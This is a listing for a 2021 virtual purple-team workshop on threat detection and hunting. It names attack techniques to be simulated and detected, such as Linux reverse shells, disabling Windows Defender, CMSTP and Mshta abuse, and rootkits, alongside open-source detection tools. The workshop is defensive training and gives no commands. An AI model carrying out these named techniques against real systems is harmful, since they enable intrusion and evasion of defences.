Free Workshop: Threat Detection and Hunting with PurpleLabs #2 [16 March]

$0.00

Duration

1 days

Delivery Method

virtual

Level

intermediate

Seats Available

20

Duration

1 days

Delivery Method

virtual

Level

intermediate

DELIVERY: VIRTUAL LIVE STREAM 

DISCORD :  https://discord.gg/XM86uPxxBZ

DATE: 16 March 2021 

TIME: 19:00 to 21:00 CET/GMT+1

 

The first workshop of the PurpleLabs series generated a great deal of interest in the scope of detection and threat hunting!

 


For the first 5 registrations, Leszek will provide 7 days of full access to the PurpleLabs environment supplied with a set of 60+ hands-on lab instructions in the purple teaming structure.


 

During the #1 session, we have covered how to get network and OS visibility/telemetry needed for advanced detection with Open Source / free tools. We’ve run few simple hunting examples and demonstrated how to use Sigma / Sentinel rules as hints/guides to learn more in the ‘detection vs attack’ formula.

 

We need to keep learning how adversaries are operating, so after a good introduction to the subject, it’s time for the next step.
During hands-on session #2*, Leszek is going to demonstrate how to create and simulate chain attack steps:
  • Rundll32 communicating with public IP addresses
  • CMSTP Execution
  • Mshta executing VBScript
  • Disabling Windows Defender / modifying Windows Firewall
  • Suspicious non-browser attempts to access suspicious URL
  • Suspicious scheduled task creation
  • Powershell execution with IP arguments
  • Malicious Named Pipe
  • Suspicious Linux Reverse Shell Command Line
  • Linux kernel space rootkit
  • and more
and provide detection coverage for the tools, techniques, and procedures by using PurpleLabs stack:
  • HELK + ElastAlert
  • Sigma rules
  • Sysmon + Windows Events
  • Splunk
  • ElastiFlow
  • Moloch FPC
  • Suricata IDS
  • Zeek IDS
  • Wazuh
  • Velociraptor
  • OSquery
  • Graylog
  • Falco
  • Syslog

* This is a continuation of the topic from the first session.

For those who want to know more about this hands-on cyber range project, here’s the all-in-one picture:

Why You Should Take This Course

TBA

Who Should Attend

TBA

Key Learning Objectives

  • Find out how Detection / Hunting Open Source Software can support your SOC infrastructure & team.

  • Learn ways to improve detection and sharpen your event correlation skills across many different data sources

  • Generate evil, find the malicious activities, and identify threat details on the network

  • Prepare your SOC team for fast filtering out network noise and allow for better incident response handling

  • Understand values of a manual and automated approach to simulate attackers and generate anomalies
  • Prerequisite Knowledge

    TBA

    Hardware / Software Requirements

    TBA

    Your Instructor

    No data was found